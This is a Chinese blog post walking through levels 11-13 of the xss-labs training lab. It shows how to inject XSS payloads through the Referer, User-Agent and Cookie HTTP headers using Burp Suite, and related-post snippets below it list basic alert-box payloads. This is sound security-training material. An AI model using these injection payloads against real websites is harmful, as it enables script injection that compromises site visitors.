xss挑战之旅11关到13关,操作步骤配截图。

最新推荐文章于 2025-05-16 09:32:41 发布
最新推荐文章于 2025-05-16 09:32:41 发布
阅读量673 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jzzer447/article/details/124203168
本文探讨了HTTP头部的Referer和User-Agent字段以及Cookie中的XSS注入问题。通过使用Burp Suite工具,展示了如何构造payload来触发XSS攻击,并介绍了level11到level13的防护策略。重点关注了HTTP头部的Referer和User-Agent字段以及Cookie在安全中的角色。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level11

分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。

 

头部本身没有Referer,自行添加了

 

payload:Referer:" onmouseover=alert(11) type="text"

      Referer:" onclick="alert(11)" type="text

level12

查看代码,str11=_SERVER['HTTP_USER_AGENT'];应该是User-Agent的http头部注入,burp抓包,构造头部User-Agent的payload。

 

payload:

User-Agent:" onmouseover=alert(12) type="text"

User-Agent:" onclick="alert(12)" type="text

 

 

level13

查看代码,这次是cookie类型的xss注入,setcookie("user", "call me maybe?", time()+3600);

 

构造payload:

Cookie:" onmouseover=alert(13) type="text"

Cookie:" onclick="alert(13)" type="text

 

 

 

jzzer447
关注
探究 XSS 漏洞:网络安全的潜在威胁与防范之道
candy的博客
12-31 371
跨站脚本攻击(Cross-Site Scripting,简称 XSS)是一种发生在客户端的代码注入攻击方式,攻击者通过在目标网站中注入恶意脚本(通常是 JavaScript 代码,但也可能包括其他客户端脚本语言,如 VBScript 等),来获取用户的敏感信息、执行非法操作或篡改网页内容,从而达到攻击的目的。
15、探索编程世界的奇妙之旅:从基础到高级
最新发布
vscode6remote的博客
05-26 36
本文从编程的基础知识到高级技术进行了全面探讨,涵盖了编程语言的发展、数据结构与算法、网络编程、数据库管理、生物信息学、计算机安全及人工智能等多个领域。通过具体示例和深入分析,帮助读者理解编程的本质并激发对编程世界的兴趣。
xss labs 挑战之旅
lemonwei
06-05 850
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
XSS挑战之旅
weixin_41182861的博客
09-26 2126
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
xss-labs靶场第11-14基础详解
m0_74741186的博客
05-16 887
11至14基础详解 14iframe标签的用法,以及闯
xss挑战之旅
m0_71326960的博客
03-16 409
使用docker搭建xss挑战之旅运行环境,xss挑战之旅level1-level3
XSS挑战之旅(10-18)
老司机开代码的博客
08-31 739
文章目录第十第十一第十二第十三第十四第十五第十六第十七第十八 第十 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 1024
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
XSS挑战之旅练习1-13
m0_53223419的博客
03-16 344
使用docker搭建靶场。
系统测试的艺术:探索之旅,20个上机练习题等你来挑战
![系统测试的艺术:探索之旅,20个上机练习题等你来挑战](https://substackcdn.com/image/fetch/w_1200,h_600,c_fill,f_jpg,q_auto:good,fl_progressive:steep,g_auto/... # 摘要 系统测试作为软件开发过程中的键环节...
跨平台操作的EIDORS之旅:兼容性分析与实战
[跨平台操作的EIDORS之旅:兼容性分析与实战](https://control.mathworks.com/matlabcentral/mlc-downloads/downloads/submissions/59263/versions/1/screenshot.jpg) 参考资源链接:[EIDORS软件函数详解:模型构建...
xss挑战
11-09
这个是XSS文件,解压后放在服务器的对应文件夹即可。 闯笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS-11注入靶场闯(小游戏)——第十一
qq_39330735的博客
02-04 604
XSS-11注入靶场闯(小游戏)——第十一详解,请求头referer注入
XSS挑战赛(xsslabs)11~16解析
黄乔国PHP
03-07 822
总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 430
好。
XSS挑战之旅[全20]上
ldkpolite007的博客
05-06 2784
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
XSS-Labs靶场1---11
m0_72676086的博客
03-07 1551
[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)_xss靶场搭建-CSDN博客(该博主总结的较为详细,若侵权必删)输入检测确定标签没有过滤后,为了显示存在漏洞,需要插入 xss 攻击代码。 常用的语句: less-1: 第一算基础卡,本身没有什么考点:我们看到代码回显出test,随后我们查看源码。这里是直接使用get传参,将值传入str中。随后我们直接使用payload: 随后完成该: 我们使用第一的方法进行测试: 随后发现即使代码正常闭合,但我们并未得出结果,此时我们查看源
xssgame第十一至第十四
学习
10-20 641
第十一 首先查看源码
零基础构建Java WEB框架的架构探险之旅
7. **处理数据持久化**:集成数据库操作,可以使用JDBC直接操作数据库,或者利用ORM框架如Hibernate、MyBatis等简化数据库操作。 8. **安全性设计**:实现用户认证和授权机制,防范常见的Web安全威胁,如SQL注入、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值